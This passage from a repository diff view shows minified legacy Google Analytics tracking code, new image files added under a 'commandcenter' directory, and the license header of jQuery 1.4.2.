var g=[D,F,G,K,H,L,ha];o.k=function(){var d=k.a[z];return k.o?o.Ob(d,k.o):d};o.Ob=function(d,a){var j=[],c,n;for(c=0;c<g[y];c++){n=f(d,g[c],a)[0];M(n)||(j[j[y]]=g[c]+n+";")}return j.join("")};o.m=function(d,a,j){var c=j>0?l(j):"";if(k.o){a=o.Yb(k.a[z],d,k.o,a,j);d="2"+d;c=j>0?l(k.w):""}u(d+a,c)};o.Yb=function(d,a,j,c,n){var s="";n=n||k.w;c=m([c,o.s+n*1],j);s=O(d,"2"+a,";");if(!M(s)){d=m(f(d,a,j,r),j);s=ma(s.split(d),"");return s=c+s}return c};o.ab=function(){return M(k.c)?"":"domain="+k.c+";"}};var ua=function(i){function f(q){q=q instanceof Array?q.join("."):"";return M(q)?"-":q}function m(q,b){var e=[],h;if(!M(q)){e=q.split(".");if(b)for(h=0;h<e[y];h++)ka(e[h])||(e[h]="-")}return e}function u(q,b,e){var h=c.K,p,t;for(p=0;p<h[y];p++){t=h[p][0];t+=M(b)?b:b+h[p][4];h[p][2](O(q,t,e))}}var l,o,k,g,d,a,j,c=this,n,s=i;c.j=new ta(i);c.gb=function(){return w==n||n==c.N()};c.k=function(){return c.j.k()};c.ha=function(){return d?d:"-"};c.sb=function(q){d=q};c.ua=function(q){n=ka(q)?q*1:"-"};c.ga=
function(){return f(a)};c.va=function(q){a=m(q)};c.Nb=function(){c.j.m(H,"",-1)};c.Zb=function(){return n?n:"-"};c.ab=function(){return M(s.c)?"":"domain="+s.c+";"};c.ea=function(){return f(l)};c.qb=function(q){l=m(q,1)};c.B=function(){return f(o)};c.ta=function(q){o=m(q,1)};c.fa=function(){return f(k)};c.rb=function(q){k=m(q,1)};c.ia=function(){return f(g)};c.tb=function(q){g=m(q);for(q=0;q<g[y];q++)if(q<4&&!ka(g[q]))g[q]="-"};c.Vb=function(){return j};c.qc=function(q){j=q};c.Kb=function(){l=[];
o=[];k=[];g=[];d=w;a=[];n=w};c.N=function(){var q="",b;for(b=0;b<c.K[y];b++)q+=c.K[b][1]();return na(q)};c.pa=function(q){var b=c.k(),e=v;if(b){u(b,q,";");c.ua(c.N());e=r}return e};c.mc=function(q){u(q,"",B);c.ua(O(q,ga,B))};c.uc=function(){var q=c.K,b=[],e;for(e=0;e<q[y];e++)S(b,q[e][0]+q[e][1]());S(b,ga+c.N());return b.join(B)};c.Bc=function(q,b){var e=c.K,h=s.h,p;c.pa(q);s.h=b;for(p=0;p<e[y];p++)M(e[p][1]())||e[p][3]();s.h=h};c.Ab=function(){c.j.m(D,c.ea(),s.w)};c.ya=function(){c.j.m(F,c.B(),s.pb)};
c.Bb=function(){c.j.m(G,c.fa(),0)};c.Aa=function(){c.j.m(K,c.ia(),s.Ma)};c.Cb=function(){c.j.m(L,c.ha(),s.w)};c.za=function(){c.j.m(H,c.ga(),s.w)};c.Dc=function(){c.j.m(ha,c.Vb(),0)};c.K=[[D,c.ea,c.qb,c.Ab,"."],[F,c.B,c.ta,c.ya,""],[G,c.fa,c.rb,c.Bb,""],[L,c.ha,c.sb,c.Cb,""],[K,c.ia,c.tb,c.Aa,"."],[H,c.ga,c.va,c.za,"."]]};var wa=function(i){var f=this,m=i,u=new ua(m),l=!X.Cc(),o=function(){},k=function(g){var d=(new Date).getTime(),a;a=(d-g[3])*(m.xc/1E3);if(a>=1){g[2]=Math.min(Math.floor(g[2]*1+a),m.Hb);g[3]=d}return g};f.F=function(g,d,a,j,c,n){var s,q=m.G,b=m.a[A];u.pa(a);s=V(u.B(),".");if(s[1]<500||j){if(c)s=k(s);if(j||!c||s[2]>=1){if(!j&&c)s[2]=s[2]*1-1;s[1]=s[1]*1+1;g="?utmwv="+da+"&utmn="+W()+(M(b.hostname)?"":"&utmhn="+P(b.hostname))+(m.S==100?"":"&utmsp="+P(m.S))+g;if(0==q||2==q){j=2==q?o:n||o;l&&f.Ta(m.ja+
g,j)}if(1==q||2==q){g=("https:"==b.protocol?"https://ssl.google-analytics.com/__utm.gif":"http://www.google-analytics.com/__utm.gif")+g+"&utmac="+d+"&utmcc="+f.Rb(a);if(va)g+="&gaq=1";if(X.Va)g+="&aip=1";l&&f.Ta(g,n)}}}u.ta(s.join("."));u.ya()};f.Ta=function(g,d){var a=new Image(1,1);a.src=g;a.onload=function(){a.onload=null;(d||o)()}};f.Rb=function(g){var d=[],a=[D,K,H,L],j,c=u.k(),n;for(j=0;j<a[y];j++){n=O(c,a[j]+g,";");if(!M(n)){if(a[j]==H){n=V(n.split(g+".")[1],"|")[0];if(M(n))continue;n=g+"."+
n}S(d,a[j]+n+";")}}return P(d.join("+"))}};var Y=function(){var i=this;i.W=[];i.db=function(f){var m,u=i.W,l;for(l=0;l<u.length;l++)m=f==u[l].q?u[l]:m;return m};i.Gb=function(f,m,u,l,o,k,g,d){var a=i.db(f);if(w==a){a=new Y.Eb(f,m,u,l,o,k,g,d);S(i.W,a)}else{a.Ja=m;a.xb=u;a.wb=l;a.ub=o;a.Qa=k;a.vb=g;a.Sa=d}return a}};Y.Db=function(i,f,m,u,l,o){var k=this;k.zb=i;k.wa=f;k.r=m;k.Oa=u;k.mb=l;k.nb=o;k.xa=function(){return"&"+["utmt=item","tid="+P(k.zb),"ipc="+P(k.wa),"ipn="+P(k.r),"iva="+P(k.Oa),"ipr="+P(k.mb),"iqt="+P(k.nb)].join("&utm")}};
Y.Eb=function(i,f,m,u,l,o,k,g){var d=this;d.q=i;d.Ja=f;d.xb=m;d.wb=u;d.ub=l;d.Qa=o;d.vb=k;d.Sa=g;d.P=[];d.Fb=function(a,j,c,n,s){var q=d.Wb(a),b=d.q;if(w==q)S(d.P,new Y.Db(b,a,j,c,n,s));else{q.zb=b;q.wa=a;q.r=j;q.Oa=c;q.mb=n;q.nb=s}};d.Wb=function(a){var j,c=d.P,n;for(n=0;n<c.length;n++)j=a==c[n].wa?c[n]:j;return j};d.xa=function(){return"&"+["utmt=tran","id="+P(d.q),"st="+P(d.Ja),"to="+P(d.xb),"tx="+P(d.wb),"sp="+P(d.ub),"ci="+P(d.Qa),"rg="+P(d.vb),"co="+P(d.Sa)].join("&utmt")}};var xa=function(i){function f(){var k,g,d;g="ShockwaveFlash";var a="$version",j=l.d?l.d.plugins:w;if(j&&j[y]>0)for(k=0;k<j[y]&&!d;k++){g=j[k];if(R(g.name,"Shockwave Flash"))d=g.description.split("Shockwave Flash ")[1]}else{g=g+"."+g;try{k=new ActiveXObject(g+".7");d=k.GetVariable(a)}catch(c){}if(!d)try{k=new ActiveXObject(g+".6");d="WIN 6,0,21,0";k.AllowScriptAccess="always";d=k.GetVariable(a)}catch(n){}if(!d)try{k=new ActiveXObject(g);d=k.GetVariable(a)}catch(s){}if(d){d=V(d.split(" ")[1],",");d=
d[0]+"."+d[1]+" r"+d[2]}}return d?d:o}var m=i,u=m.e,l=this,o="-";l.T=u.screen;l.La=!l.T&&u.java?java.awt.Toolkit.getDefaultToolkit():w;l.d=u.navigator;l.U=o;l.sa=o;l.Pa=o;l.la=o;l.ka=1;l.Za=o;l.Sb=function(){var k;if(u.screen){l.U=l.T.width+"x"+l.T.height;l.sa=l.T.colorDepth+"-bit"}else if(l.La)try{k=l.La.getScreenSize();l.U=k.width+"x"+k.height}catch(g){}l.la=U(l.d&&l.d.language?l.d.language:l.d&&l.d.browserLanguage?l.d.browserLanguage:o);l.ka=l.d&&l.d.javaEnabled()?1:0;l.Za=m.ba?f():o;l.Pa=P(m.a.characterSet?
m.a.characterSet:m.a.charset?m.a.charset:o)};l.vc=function(){return B+"utm"+["cs="+P(l.Pa),"sr="+l.U,"sc="+l.sa,"ul="+l.la,"je="+l.ka,"fl="+P(l.Za)].join("&utm")};l.Qb=function(){var k=m.a,g=u.history[y];k=l.d.appName+l.d.version+l.la+l.d.platform+l.d.userAgent+l.ka+l.U+l.sa+(k[z]?k[z]:"")+(k.referrer?k.referrer:"");for(var d=k[y];g>0;)k+=g--^d++;return na(k)}};var Z=function(i,f,m,u){function l(d){var a="";d=U(d.split("://")[1]);if(R(d,"/")){d=d.split("/")[1];if(R(d,"?"))a=d.split("?")[0]}return a}function o(d){var a="";a=U(d.split("://")[1]);if(R(a,"/"))a=a.split("/")[0];return a}var k=u,g=this;g.b=i;g.ob=f;g.s=m;g.cb=function(d){var a=g.da();return new Z.t(O(d,k.Da+C,B),O(d,k.Ga+C,B),O(d,k.Ia+C,B),g.O(d,k.Ba,"(not set)"),g.O(d,k.Ea,"(not set)"),g.O(d,k.Ha,a&&!M(a.I)?Q(a.I):w),g.O(d,k.Ca,w))};g.fb=function(d){var a=o(d),j=l(d);if(R(a,"google")){d=d.split("?").join(B);
if(R(d,B+k.bc+C))if(j==k.ac)return r}return v};g.da=function(){var d,a=g.ob,j,c,n=k.R;if(!(M(a)||"0"==a||!R(a,"://")||g.fb(a))){d=o(a);for(j=0;j<n[y];j++){c=n[j];if(R(d,U(c.Wa))){a=a.split("?").join(B);if(R(a,B+c.jb+C)){d=a.split(B+c.jb+C)[1];if(R(d,B))d=d.split(B)[0];return new Z.t(w,c.Wa,w,"(organic)","organic",d,w)}}}}};g.O=function(d,a,j){d=O(d,a+C,B);return j=!M(d)?Q(d):!M(j)?j:"-"};g.hc=function(d){var a=k.oa,j=v,c;if(d&&"organic"==d.Q){d=U(Q(d.I));for(c=0;c<a[y];c++)j=j||U(a[c])==d}return j};
g.bb=function(){var d="",a="";d=g.ob;if(!(M(d)||"0"==d||!R(d,"://")||g.fb(d))){d=d.split("://")[1];if(R(d,"/")){a=N(d,d.indexOf("/"));a=a.split("?")[0];d=U(d.split("/")[0])}if(0==d.indexOf("www."))d=N(d,4);return new Z.t(w,d,w,"(referral)","referral",w,a)}};g.$a=function(d){var a="";if(k.Y){a=d&&d.hash?d.href.substring(d.href.indexOf("#")):"";a=""!=a?a+B:a}a+=d.search;return a};g.Tb=function(){return new Z.t(w,"(direct)",w,"(direct)","(none)",w,w)};g.ic=function(d){var a=v,j,c=k.qa;if(d&&"referral"==
d.Q){d=U(P(d.V));for(j=0;j<c[y];j++)a=a||R(d,U(c[j]))}return a};g.l=function(d){return w!=d&&d.ib()};g.isNewCampaign=function(d){d=O(d,K+g.b+".",";");var a=d.split(".");d=new Z.t;d.lb(a.slice(4).join("."));if(!g.l(d))return true;a=k.a[A];a=g.$a(a);a=g.cb(a);if(!g.l(a)){a=g.da();g.l(a)||(a=g.bb())}return g.l(a)&&U(d.J())!=U(a.J())};g.getCampaignInformation=function(d,a){if(k.Na){var j="",c="-",n,s=0,q,b,e=g.b;if(d){b=d.k();j=g.$a(k.a[A]);if(k.z&&d.gb()){c=d.ia();if(!M(c)&&!R(c,";")){d.Aa();return}}c=
O(b,K+e+".",";");n=g.cb(j);if(g.l(n)){j=O(j,k.Fa+C,B);if("1"==j&&!M(c))return}if(!g.l(n)){n=g.da();if(!M(c)&&g.hc(n))return}if(!g.l(n)&&a){n=g.bb();if(!M(c)&&g.ic(n))return}if(!g.l(n))if(M(c)&&a)n=g.Tb();if(g.l(n)){if(!M(c)){s=c.split(".");q=new Z.t;q.lb(s.slice(4).join("."));q=U(q.J())==U(n.J());s=s[3]*1}if(!q||a){b=O(b,D+e+".",";");q=b.lastIndexOf(".");b=q>9?N(b,q+1)*1:0;s++;b=0==b?1:b;d.tb([e,g.s,b,s,n.J()].join("."));d.Aa()}}}}}};
Z.t=function(i,f,m,u,l,o,k){var g=this;g.q=i;g.V=f;g.Z=m;g.r=u;g.Q=l;g.I=o;g.Ra=k;g.J=function(){var d=[],a=[["cid",g.q],["csr",g.V],["gclid",g.Z],["ccn",g.r],["cmd",g.Q],["ctr",g.I],["cct",g.Ra]],j,c;if(g.ib())for(j=0;j<a[y];j++)if(!M(a[j][1])){c=a[j][1].split("+").join("%20");c=c.split(" ").join("%20");S(d,"utm"+a[j][0]+C+c)}return d.join("|")};g.ib=function(){return!(M(g.q)&&M(g.V)&&M(g.Z))};g.lb=function(d){var a=function(j){return Q(O(d,"utm"+j+C,"|"))};g.q=a("cid");g.V=a("csr");g.Z=a("gclid");
g.r=a("ccn");g.Q=a("cmd");g.I=a("ctr");g.Ra=a("cct")}};var ya=function(i,f,m,u){function l(j,c,n){var s;if(!M(n)){n=n.split(",");for(var q=0;q<n[y];q++){s=n[q];if(!M(s)){s=s.split(g);if(s[y]==4)c[s[0]]=[s[1],s[2],j]}}}}var o=this,k=f,g=C,d=i,a=u;o.L=m;o.na="";o.p={};o.gc=function(){var j;j=V(O(o.L.k(),H+k+".",";"),k+".")[1];if(!M(j)){j=j.split("|");l(1,o.p,j[1]);o.na=j[0];o.X()}};o.X=function(){o.Ib();var j=o.na,c,n,s="";for(c in o.p)if((n=o.p[c])&&1===n[2])s+=c+g+n[0]+g+n[1]+g+1+",";M(s)||(j+="|"+s);if(M(j))o.L.Nb();else{o.L.va(k+"."+j);o.L.za()}};o.rc=
function(j){o.na=j;o.X()};o.pc=function(j,c,n,s){if(1!=s&&2!=s&&3!=s)s=3;var q=v;if(c&&n&&j>0&&j<=d.kb){c=P(c);n=P(n);if(c[y]+n[y]<=64){o.p[j]=[c,n,s];o.X();q=r}}return q};o.$b=function(j){if((j=o.p[j])&&1===j[2])return j[1]};o.Mb=function(j){var c=o.p;if(c[j]){delete c[j];o.X()}};o.Ib=function(){a._clearKey(8);a._clearKey(9);a._clearKey(11);var j=o.p,c,n;for(n in j)if(c=j[n]){a._setKey(8,n,c[0]);a._setKey(9,n,c[1]);(c=c[2])&&3!=c&&a._setKey(11,n,""+c)}}};var $=function(){function i(h,p,t,x){if(w==k[h])k[h]={};if(w==k[h][p])k[h][p]=[];k[h][p][t]=x}function f(h,p){if(w!=k[h]&&w!=k[h][p]){k[h][p]=w;var t=r,x;for(x=0;x<a[y];x++)if(w!=k[h][a[x]]){t=v;break}if(t)k[h]=w}}function m(h){var p="",t=v,x,E;for(x=0;x<a[y];x++){E=h[a[x]];if(w!=E){if(t)p+=a[x];p+=u(E);t=v}else t=r}return p}function u(h){var p=[],t,x;for(x=0;x<h[y];x++)if(w!=h[x]){t="";if(x!=e&&w==h[x-1])t+=x.toString()+s;t+=l(h[x]);S(p,t)}return j+p.join(n)+c}function l(h){var p="",t,x,E;for(t=
0;t<h[y];t++){x=h.charAt(t);E=b[x];p+=w!=E?E:x}return p}var o=this,k={},g="k",d="v",a=[g,d],j="(",c=")",n="*",s="!",q="'",b={};b[q]="'0";b[c]="'1";b[n]="'2";b[s]="'3";var e=1;o.dc=function(h){return w!=k[h]};o.D=function(){var h="",p;for(p in k)if(w!=k[p])h+=p.toString()+m(k[p]);return h};o.nc=function(h){if(h==w)return o.D();var p=h.D(),t;for(t in k)if(w!=k[t]&&!h.dc(t))p+=t.toString()+m(k[t]);return p};o._setKey=function(h,p,t){if(typeof t!="string")return v;i(h,g,p,t);return r};o._setValue=function(h,
p,t){if(typeof t!="number"&&(w==Number||!(t instanceof Number))||Math.round(t)!=t||t==NaN||t==Infinity)return v;i(h,d,p,t.toString());return r};o._getKey=function(h,p){return w!=k[h]&&w!=k[h][g]?k[h][g][p]:w};o._getValue=function(h,p){return w!=k[h]&&w!=k[h][d]?k[h][d][p]:w};o._clearKey=function(h){f(h,g)};o._clearValue=function(h){f(h,d)}};var za=function(i,f){var m=this;m.Fc=f;m.jc=i;m._trackEvent=function(u,l,o){return f._trackEvent(m.jc,u,l,o)}};var Aa=function(i,f,m){function u(){if("auto"==c.c){var b=c.a.domain;if("www."==N(b,0,4))b=N(b,4);c.c=b}c.c=U(c.c)}function l(){u();var b=c.c,e=b.indexOf("www.google.")*b.indexOf(".google.")*b.indexOf("google.");return e||"/"!=c.h||b.indexOf("google.org")>-1}function o(b,e,h){if(M(b)||M(e)||M(h))return"-";b=O(b,D+a.b+".",e);if(!M(b)){b=b.split(".");b[5]=b[5]?b[5]*1+1:1;b[3]=b[4];b[4]=h;b=b.join(".")}return b}function k(){return"file:"!=c.a[A].protocol&&l()}function g(b){if(!b||""==b)return"";for(;ia(b.charAt(0));)b=
N(b,1);for(;ia(b.charAt(b[y]-1));)b=N(b,0,b[y]-1);return b}function d(b,e,h,p){if(!M(b())){e(p?Q(b()):b());R(b(),";")||h()}}var a=this,j=w,c=new sa,n=v,s=w;a.e=window;a.r=i;a.s=Math.round((new Date).getTime()/1E3);a.n=f||"UA-XXXXX-X";a.Ua=c.a.referrer;a.ca=w;a.f=w;a.M=w;a.C=v;a.A=w;a.g=w;a.Xa=w;a.b=w;a.i=w;c.o=m?P(m):w;var q=function(b){var e,h=""!=b&&c.a[A].host!=b;if(h)for(e=0;e<c.u[y];e++)h=h&&la(U(b),U(c.u[e]))==-1;return h};a.lc=function(){if(!a.M)return null;var b=a.M.match(/^(?:\|([-0-9a-z.]{1,30})(?::(\d{4,5}))?\|)?([-.\w]{10,1200})$/i);
if(!b)return null;return{domain:b[1]||null,port:b[2]||null,token:b[3]}};a.Xb=function(){return W()^a.A.Qb()&2147483647};a.Ub=function(){if(!c.c||""==c.c||"none"==c.c){c.c="";return 1}u();return c.Ka?na(c.c):1};a.Pb=function(b,e){if(M(b))b="-";else{e+=c.h&&"/"!=c.h?c.h:"";var h=b.indexOf(e);b=h>=0&&h<=8?"0":"["==b.charAt(0)&&"]"==b.charAt(b[y]-1)?"-":b}return b};a.ra=function(b){var e="",h=c.a;e+=c.$?a.A.vc():"";e+=c.aa&&!M(h.title)?"&utmdt="+P(h.title):"";e+="&utmhid="+oa()+"&utmr="+P(a.ca)+"&utmp="+
P(a.oc(b));return e};a.oc=function(b){var e=c.a[A];return b=w!=b&&""!=b?P(b,r):P(e.pathname+e.search,r)};a.yc=function(b){if(a.H()){var e="";if(a.g!=w&&a.g.D()[y]>0)e+="&utme="+P(a.g.D());e+=a.ra(b);j.F(e,a.n,a.b)}};a.Lb=function(){var b=new ua(c);return b.pa(a.b)?b.uc():w};a._getLinkerUrl=function(b,e){var h=b.split("#"),p=b,t=a.Lb();if(t)if(e&&1>=h[y])p+="#"+t;else if(!e||1>=h[y])if(1>=h[y])p+=(R(b,"?")?B:"?")+t;else p=h[0]+(R(b,"?")?B:"?")+t+"#"+h[1];return p};a.sc=function(){var b=a.lc();if(b){a.i.qc(a.M);
a.i.Dc();X._gasoDomain=c.c;X._gasoCPath=c.h;var e="www.google.com";if(b.domain)e=b.domain+".google.com"+(b.port?":"+b.port:"");var h="https://www.google.com/analytics/reporting/overlay_js?gaso=";if(b.domain)h="https://"+e+"/analytics/reporting/overlay_js?gaso=";h+=b.token+B+W();pa(h,"_gasojs")}};a.cc=function(){var b=a.s,e=a.i,h=e.k(),p=a.b+"",t=c.e,x=t?t.gaGlobal:w,E,ja=R(h,D+p+"."),Ba=R(h,F+p),Ca=R(h,G+p),I,J=[],T="",qa=v;h=M(h)?"":h;if(c.z){E=c.a[A]&&c.a[A].hash?c.a[A].href.substring(c.a[A].href.indexOf("#")):
"";if(c.Y&&!M(E))T=E+B;T+=c.a[A].search;if(!M(T)&&R(T,D)){e.mc(T);e.gb()||e.Kb();I=e.ea()}d(e.ha,e.sb,e.Cb,true);d(e.ga,e.va,e.za)}if(M(I))if(ja)if(!Ba||!Ca||0){I=o(h,";",b);a.C=r}else{I=O(h,D+p+".",";");J=V(O(h,F+p,";"),".")}else{I=ma([p,a.Xb(),b,b,b,1],".");qa=a.C=r}else if(M(e.B())||M(e.fa())){I=o(T,B,b);a.C=r}else{J=V(e.B(),".");p=J[0]}I=I.split(".");if(t&&x&&x.dh==p&&!c.o){I[4]=x.sid?x.sid:I[4];if(qa){I[3]=x.sid?x.sid:I[4];if(x.vid){b=x.vid.split(".");I[1]=b[0];I[2]=b[1]}}}e.qb(I.join("."));
J[0]=p;J[1]=J[1]?J[1]:0;J[2]=w!=J[2]?J[2]:c.wc;J[3]=J[3]?J[3]:I[4];e.ta(J.join("."));e.rb(p);M(e.Zb())||e.ua(e.N());e.Ab();e.ya();e.Bb()};a.ec=function(){j=new wa(c)};a._getName=function(){return a.r};a._initData=function(){var b;if(!n){if(!a.A){a.A=new xa(c);a.A.Sb()}a.b=a.Ub();a.i=new ua(c);a.g=new $;s=new ya(c,a.b,a.i,a.g);a.ec()}if(k()){if(!n){a.ca=a.Pb(a.Ua,c.a.domain);b=new Z(a.b,a.ca,a.s,c)}a.cc(b);s.gc()}if(!n){k()&&b.getCampaignInformation(a.i,a.C);a.Xa=new $;n=r}a.fc()};a._visitCode=function(){a._initData();
var b=O(a.i.k(),D+a.b+".",";");b=b.split(".");return b[y]<4?"":b[1]};a._cookiePathCopy=function(b){a._initData();a.i&&a.i.Bc(a.b,b)};a.fc=function(){if(!X.eb){var b=c.a[A].hash;if(b&&1==b.indexOf("gaso="))b=O(b,"gaso=",B);else b=(b=c.e.name)&&0<=b.indexOf("gaso=")?O(b,"gaso=",B):O(a.i.k(),ha,";");if(b[y]>=10){a.M=b;a.sc()}X.eb=r}};a.H=function(){return a._visitCode()%1E4<c.S*100};a.tc=function(){var b,e,h=c.a.links;if(!c.hb){b=c.a.domain;if("www."==N(b,0,4))b=N(b,4);c.u.push("."+b)}for(b=0;b<h[y]&&
(c.ma==-1||b<c.ma);b++){e=h[b];if(q(e.host))if(!e.gatcOnclick){e.gatcOnclick=e.onclick?e.onclick:a.kc;e.onclick=function(p){var t=!this.target||this.target=="_self"||this.target=="_top"||this.target=="_parent";t=t&&!a.Jb(p);a.zc(p,this,t);return t?v:this.gatcOnclick?this.gatcOnclick(p):r}}}};a.kc=function(){};a._trackPageview=function(b){if(k()){a._initData();c.u&&a.tc();a.yc(b);a.C=v}};a._trackTrans=function(){var b=a.b,e=[],h,p,t;a._initData();if(a.f&&a.H()){for(h=0;h<a.f.W[y];h++){p=a.f.W[h];S(e,
p.xa());for(t=0;t<p.P[y];t++)S(e,p.P[t].xa())}for(h=0;h<e[y];h++)j.F(e[h],a.n,b,r)}};a._setTrans=function(){var b=c.a,e,h,p;b=b.getElementById?b.getElementById("utmtrans"):b.utmform&&b.utmform.utmtrans?b.utmform.utmtrans:w;a._initData();if(b&&b.value){a.f=new Y;p=b.value.split("UTM:");c.v=!c.v||""==c.v?"|":c.v;for(b=0;b<p[y];b++){p[b]=g(p[b]);e=p[b].split(c.v);for(h=0;h<e[y];h++)e[h]=g(e[h]);if("T"==e[0])a._addTrans(e[1],e[2],e[3],e[4],e[5],e[6],e[7],e[8]);else"I"==e[0]&&a._addItem(e[1],e[2],e[3],
e[4],e[5],e[6])}}};a._addTrans=function(b,e,h,p,t,x,E,ja){a.f=a.f?a.f:new Y;return a.f.Gb(b,e,h,p,t,x,E,ja)};a._addItem=function(b,e,h,p,t,x){var E;a.f=a.f?a.f:new Y;(E=a.f.db(b))||(E=a._addTrans(b,"","","","","","",""));E.Fb(e,h,p,t,x)};a._setVar=function(b){if(b&&""!=b&&l()){a._initData();s.rc(P(b));a.H()&&j.F("&utmt=var",a.n,a.b)}};a._setCustomVar=function(b,e,h,p){a._initData();return s.pc(b,e,h,p)};a._deleteCustomVar=function(b){a._initData();s.Mb(b)};a._getVisitorCustomVar=function(b){a._initData();
return s.$b(b)};a._setMaxCustomVariables=function(b){c.kb=b};a._link=function(b,e){if(c.z&&b){a._initData();c.a[A].href=a._getLinkerUrl(b,e)}};a._linkByPost=function(b,e){if(c.z&&b&&b.action){a._initData();b.action=a._getLinkerUrl(b.action,e)}};a._setXKey=function(b,e,h){a.g._setKey(b,e,h)};a._setXValue=function(b,e,h){a.g._setValue(b,e,h)};a._getXKey=function(b,e){return a.g._getKey(b,e)};a._getXValue=function(b,e){return a.g.getValue(b,e)};a._clearXKey=function(b){a.g._clearKey(b)};a._clearXValue=
function(b){a.g._clearValue(b)};a._createXObj=function(){a._initData();return new $};a._sendXEvent=function(b){var e="";a._initData();if(a.H()){e+="&utmt=event&utme="+P(a.g.nc(b))+a.ra();j.F(e,a.n,a.b,v,r)}};a._createEventTracker=function(b){a._initData();return new za(b,a)};a._trackEvent=function(b,e,h,p){a._initData();var t=a.Xa;if(w!=b&&w!=e&&""!=b&&""!=e){t._clearKey(5);t._clearValue(5);(b=t._setKey(5,1,b)&&t._setKey(5,2,e)&&(w==h||t._setKey(5,3,h))&&(w==p||t._setValue(5,1,p)))&&a._sendXEvent(t)}else b=
v;return b};a.zc=function(b,e,h){a._initData();if(a.H()){var p=new $;p._setKey(6,1,e.href);var t=h?function(){a.Ya(b,e)}:w;j.F("&utmt=event&utme="+P(p.D())+a.ra(),a.n,a.b,v,r,t);h&&c.e.setTimeout(function(){a.Ya(b,e)},500)}};a.Ya=function(b,e){if(!b)b=c.e.event;var h=r;if(e.gatcOnclick)h=e.gatcOnclick(b);if(h||typeof h=="undefined")if(!e.target||e.target=="_self")c.e[A]=e.href;else if(e.target=="_top")c.e.top.document[A]=e.href;else if(e.target=="_parent")c.e.parent.document[A]=e.href};a.Jb=function(b){if(!b)b=
c.e.event;var e=b.shiftKey||b.ctrlKey||b.altKey;if(!e)if(b.modifiers&&c.e.Event)e=b.modifiers&c.e.Event.CONTROL_MASK||b.modifiers&c.e.Event.SHIFT_MASK||b.modifiers&c.e.Event.ALT_MASK;return e};a.Ec=function(){return c};a._setDomainName=function(b){c.c=b};a._addOrganic=function(b,e,h){c.R.splice(h?0:c.R.length,0,new ra(b,e))};a._clearOrganic=function(){c.R=[]};a._addIgnoredOrganic=function(b){S(c.oa,b)};a._clearIgnoredOrganic=function(){c.oa=[]};a._addIgnoredRef=function(b){S(c.qa,b)};a._clearIgnoredRef=
function(){c.qa=[]};a._setAllowHash=function(b){c.Ka=b?1:0};a._setCampaignTrack=function(b){c.Na=b?1:0};a._setClientInfo=function(b){c.$=b?1:0};a._getClientInfo=function(){return c.$};a._setCookiePath=function(b){c.h=b};a._setTransactionDelim=function(b){c.v=b};a._setCookieTimeout=function(b){a._setCampaignCookieTimeout(b*1E3)};a._setCampaignCookieTimeout=function(b){c.Ma=b};a._setDetectFlash=function(b){c.ba=b?1:0};a._getDetectFlash=function(){return c.ba};a._setDetectTitle=function(b){c.aa=b?1:
0};a._getDetectTitle=function(){return c.aa};a._setLocalGifPath=function(b){c.ja=b};a._getLocalGifPath=function(){return c.ja};a._setLocalServerMode=function(){c.G=0};a._setRemoteServerMode=function(){c.G=1};a._setLocalRemoteServerMode=function(){c.G=2};a._getServiceMode=function(){return c.G};a._setSampleRate=function(b){c.S=b};a._setSessionTimeout=function(b){a._setSessionCookieTimeout(b*1E3)};a._setSessionCookieTimeout=function(b){c.pb=b};a._setAllowLinker=function(b){c.z=b?1:0};a._setAllowAnchor=
function(b){c.Y=b?1:0};a._setCampNameKey=function(b){c.Ba=b};a._setCampContentKey=function(b){c.Ca=b};a._setCampIdKey=function(b){c.Da=b};a._setCampMediumKey=function(b){c.Ea=b};a._setCampNOKey=function(b){c.Fa=b};a._setCampSourceKey=function(b){c.Ga=b};a._setCampTermKey=function(b){c.Ha=b};a._setCampCIdKey=function(b){c.Ia=b};a._getAccount=function(){return a.n};a._setAccount=function(b){a.n=b};a._setNamespace=function(b){c.o=b?P(b):w};a._getVersion=function(){return da};a._setAutoTrackOutbound=
function(b){c.u=[];if(b)c.u=b};a._setTrackOutboundSubdomains=function(b){c.hb=b};a._setHrefExamineLimit=function(b){c.ma=b};a._setReferrerOverride=function(b){a.Ua=b};a._setCookiePersistence=function(b){a._setVisitorCookieTimeout(b)};a._setVisitorCookieTimeout=function(b){c.w=b}};var Da=function(){var i=this;i.Va=v;i.yb={};i.Ac=0;i.eb=v;i._gasoDomain=w;i._gasoCPath=w;i._getTracker=function(f,m){return i._createTracker(f,w,m)};i._createTracker=function(f,m,u){if(m==w)m="~"+X.Ac++;return X.yb[m]=new Aa(m,f,u)};i._getTrackerByName=function(f){f=f||"";return X.yb[f]||X._createTracker(undefined,f)};i.Cc=function(){var f=window[ea];return f&&f[fa]&&f[fa]()};i._anonymizeIp=function(){i.Va=r}};var va=v,Fa=function(){var i=this;i._createAsyncTracker=function(f,m){return X._createTracker(f,m||"")};i._getAsyncTracker=function(f){return X._getTrackerByName(f)};i.push=function(){var f=arguments,m=0;va=r;for(var u=0;u<f[y];u++)try{if(typeof f[u]==="function")f[u]();else{var l="",o=f[u][0],k=o.lastIndexOf(".");if(k>0){l=N(o,0,k);o=N(o,k+1)}var g=l==aa?X:l==ba?Ea:X._getTrackerByName(l);g[o].apply(g,f[u].slice(1))}}catch(d){m++}return m}};function Ga(){var i=window[aa];if(i&&typeof i._getTracker=="function")X=i;else window[aa]=X}function Ha(){var i=window[ba],f=v;if(i&&typeof i.push=="function"){f=i.constructor==Array;if(!f)return}window[ba]=Ea;f&&Ea.push.apply(Ea,i)}var X=new Da;Ga();var Ea=new Fa;Ha();})()

BIN
src/commandcenter/files/header.jpg Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 32 KiB

BIN
src/commandcenter/files/icon_smile.gif Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 174 B

BIN
src/commandcenter/files/infectious.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 3.9 KiB

154
src/commandcenter/files/jquery.js vendored Normal file
View file

@ -0,0 +1,154 @@
/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2010, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: Sat Feb 13 22:33:48 2010 -0500
*/
